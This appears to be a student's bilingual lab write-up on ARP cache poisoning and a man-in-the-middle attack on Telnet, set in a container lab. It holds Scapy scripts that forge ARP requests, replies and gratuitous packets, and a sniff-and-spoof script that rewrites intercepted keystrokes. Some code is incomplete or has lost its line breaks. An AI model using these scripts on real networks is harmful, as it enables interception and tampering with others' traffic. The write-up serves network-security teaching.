


Task 1: ARP Cache Poisoning

Task 2: MITM Attack on Telnet using ARP Cache Poisoning


主机名 IP 地址 MAC 地址
M (攻击者) 02:42:0a:09:00:69
A (客户端) 02:42:0a:09:00:05
B (服务器) 02:42:0a:09:00:06


Task 1: ARP Cache Poisoning

Task 1A (using ARP request).

On host M, construct an ARP request packet and send to host A. Check whether M’s MAC address is mapped to B’s IP address in A’s ARP cache.

在主机 M 上,构造一个 ARP 请求包,发送给主机 A。查看主机 A 的 ARP 缓存中 M 的 MAC 地址是否映射到 B 的 IP 地址。

from scapy.all import *
# M
src_mac='02:42:0a:09:00:69'# M
src_ip='' # B
dst_ip='' # 任意 IP
eth = Ether(src=src_mac,dst=dst_mac_eth)
arp = ARP(hwsrc=src_mac, psrc=src_ip, hwdst=dst_mac, pdst=dst_ip, op=1)
pkt = eth / arp



• Task 1B (using ARP reply).

On host M, construct an ARP reply packet and send to host A. Check whether M’s MAC address is mapped to B’s IP address in A’s ARP cache.

在主机 M 上,构造一个 ARP 应答包,发送给主机 A。在 A 的 ARP 缓存中检查 M 的 MAC 地址是否映射到 B 的 IP 地址。

from scapy.all import *
src_mac='02:42:0a:09:00:69' # M
dst_mac='02:42:0a:09:00:05' # A
src_ip='' # B
dst_ip='' # A
eth = Ether(src=src_mac, dst=dst_mac)
arp = ARP(hwsrc=src_mac, psrc=src_ip, hwdst=dst_mac, pdst=dst_ip, op=2)
pkt = eth / arp


• Task 1C (using ARP gratuitous message).

On host M, construct an ARP gratuitous packets. ARP gratuitous packet is a special ARP request packet. It is used when a host machine needs to update outdated information on all the other machine’s ARP cache.

在主机 M 上,构造一个 ARP 免费包。 ARP 免费包是一种特殊的 ARP 请求包。 当主机需要更新所有其他机器的 ARP 缓存上的过时信息时使用它。

from scapy.all import *
src_mac='02:42:0a:09:00:69' # M
dst_mac='ff:ff:ff:ff:ff:ff' # broadcast MAC address
src_ip='' # B
dst_ip='' # B
eth = Ether(src=src_mac, dst=dst_mac)
arp = ARP(hwsrc=src_mac, psrc=src_ip, hwdst=dst_mac, pdst=dst_ip, op=2)
pkt = eth / arp


Task 2: MITM Attack on Telnet using ARP Cache Poisoning

Step 1 (Launch the ARP cache poisoning attack).

First, Host M conducts an ARP cache poisoning attack on both A and B, such that in A’s ARP cache, B’s IP address maps to M’s MAC address, and in B’s ARP cache, A’s IP address also maps to M’s MAC address. After this step, packets sent between A and B will all be sent to M. We will use the ARP cache poisoning attack from Task 1 to achieve this goal.



from scapy.all import *
# M
src_ip='' # A
dst_ip='' # B
eth = Ether(src=src_mac,dst=dst_mac_eth)
arp = ARP(hwsrc=src_mac, psrc=src_ip, hwdst=dst_mac, pdst=dst_ip, op=1)
pkt = eth / arp


Step 2 (Testing).

After the attack is successful, please try to ping each other between Hosts A and B, and report your observation. Please show Wireshark results in your report.

攻击成功后,在Host A和B之间互相ping。


Step 3 (Turn on IP forwarding).

Now we turn on the IP forwarding on Host M, so it will forward the packets between A and B. Please run the following command and repeat Step 2.






Step 4 (Launch the MITM attack).

      We are ready to make changes to the Telnet data between A and B. Assume that A is the Telnet client and B is the Telnet server. After A has connected to the Telnet server on B, for every key stroke typed in A’s Telnet window, a TCP packet is generated and sent to B. We would like to intercept the TCP packet, and replace each typed character with a fixed character (say Z). This way, it does not matter what the user types on A, Telnet will always display Z.



sysctl net.ipv4.ip_forward=0

在 A 的 Telnet 窗口中输入一些内容,发现无法输入以及回车。



from scapy.all import *VM_A_IP = ""
VM_B_IP = ""
def spoof_pkt(pkt):if pkt[IP].src == VM_A_IP and pkt[IP].dst == VM_B_IP and pkt[TCP].payload:# Create a new packet based on the captured one.# (1) We need to delete the checksum fields in the IP and TCP headers,# because our modification will make them invalid.# Scapy will recalculate them for us if these fields are missing.# (2) We also delete the original TCP payload.newpkt = pkt[IP]del(newpkt.chksum)del(newpkt[TCP].chksum)del(newpkt[TCP].payload)###################################################################### Construct the new payload based on the old payload.# Students need to implement this part.#olddata = pkt[TCP].payload.load # Get the original payload datanewdata = str.encode('Z') # No change is made in this sample code#newdata = "Z" * len(olddata)###################################################################### Attach the new data and set the packet outsend(newpkt/newdata)elif pkt[IP].src == VM_B_IP and pkt[IP].dst == VM_A_IP:send(pkt[IP]) # Forward the original packet
pkt = sniff(filter="ether src host not 02:42:0a:09:00:69 and tcp",prn=spoof_pkt)




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